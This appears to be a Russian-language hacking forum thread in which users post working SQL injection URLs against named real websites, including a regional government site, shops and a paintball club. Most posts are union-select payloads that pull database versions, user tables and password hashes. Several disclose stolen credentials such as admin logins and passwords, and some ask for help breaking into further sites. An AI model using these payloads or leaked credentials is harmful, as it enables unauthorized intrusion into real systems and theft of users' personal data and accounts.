Правительство Амурской области http://www.amurobl.ru/index.php?m=&r=3&c=-1/**/union/**/select/**/0,1,2,3,version(),5,6/*
http://www.weed.ru/pphlogger/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,version(),null,null,null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit PS: auth: имя: blacksun пароль: B1kC9i4P
sql иньекциях не силен по этому и хочу разобраться чё к чему www.rayner.com Поехали) http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysql.user/* 5.0.32-Debian_7etch1-log http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.user/* Даёт user их 5. http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql.user/* а по такому запросу пишет как я по нимаю пароли в зашифровки mb5. *0EF29B1AED94CC60062FED7F4DF2224A0C880A10 *6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD *7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83 *8050739003BBDB60551FA99B5FFF34957C4F5F49 Тек ли это и стоит ли тратить време на их расшифровку???
Code: http://zoorinok.com.ua/zoo_details.php?id=-9061+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws(char(58),username,user_password,user_icq,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users/*
www.pilot-film.com http://www.pilot-film.com/index.php?p=show_person&pid=-2+union+select+1,2,3,4,5,6,7,8,9,10/*
tor4) это не MD5, это mysql(des..) тебе сюда http://forum.antichat.ru/thread12768.html или.. вытаскивай пароли админов сайтов. например: или можно вобще весь сервак похекать.. Apache/2.2.3 (Debian) PHP/4.4.4-8+etch4 mod_ssl/2.2.3 OpenSSL/0.9.8c Server at www.rayner.com Port 80 уязвимость - Apache Mod SSL Util UUEncode Binary Stack Buffer Overflow Vulnerability + еще есть ХСС.. и BlindSQL. наврено сайт для тренеровки сделан
www.saltillo.com Уязвимость: Code: http://www.saltillo.com/products/index.php?product=36&product_id=15' Столбцы: Code: http://www.saltillo.com/products/index.php?product=36&product_id=15+union+select+1,2,3,4,5,6,7,8,9,0/* Информация: Code: 4.0.27-log contentdata saltillo@localhost P.S. скиньте в пм ссылки на инфу о инжектах в 4ых базах
Помогите.. Вобщем Http://truba.karelia.ru просто добавил к этому http://truba.karelia.ru/ls_server и получилось error: MySql error: Unknown column 'shuric' in 'where clause' query: SELECT `ls_folders`.`folder_id`, `ls_folders`.`folder_name`, `ls_folders`.`system_folder`, `ls_contacts`.`user_passport_login`, `ls_contacts`.`contact_passport_login`, `ls_contacts`.`contact_name`, `ls_contacts`.`message_size`, `ls_contacts`.`create` FROM `ls_contacts` LEFT JOIN `ls_folders` ON `ls_contacts`.`folder_id`=`ls_folders`.`folder_id` WHERE `ls_contacts`.`contact_id`=shuric AND `ls_contacts`.`user_passport_login`='romanp' LIMIT 1 Может кто поможет че нить придумать с этим сайтиком?
http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* слепая чтоли?
_http://www.cantonrep.com/index.php?ID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* Сори запостил не обновляя ветку)
Вот бажный скрипт) breitbart:breitbart@localhost:4.1.20-log Жопный вариант подобрать Имя таблици не получилось
http://doshirak.com/PWE/etc/loader.php?mid='75&mode=local&module=/etc/checkanswer&template=checkanswer.aj помогите раскрутить и вообще рабочая она ли ?
Секс шоп _http://eroshop.com.ua/?sec=det&id=0'+UNION+SELECT+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+FROM+users/* Admin:19820429
http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) useraintball_user@localhost version:5.0.51a-community-log ------------------------------------------------------------------------------------------------------------------- http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(login,0x3a,pass,0x3a)+from+pb_users +limit+1,1 логины и пароли от 234 пользователей ------------------------------------------------------------------------------------------------------------------- там еще много чего...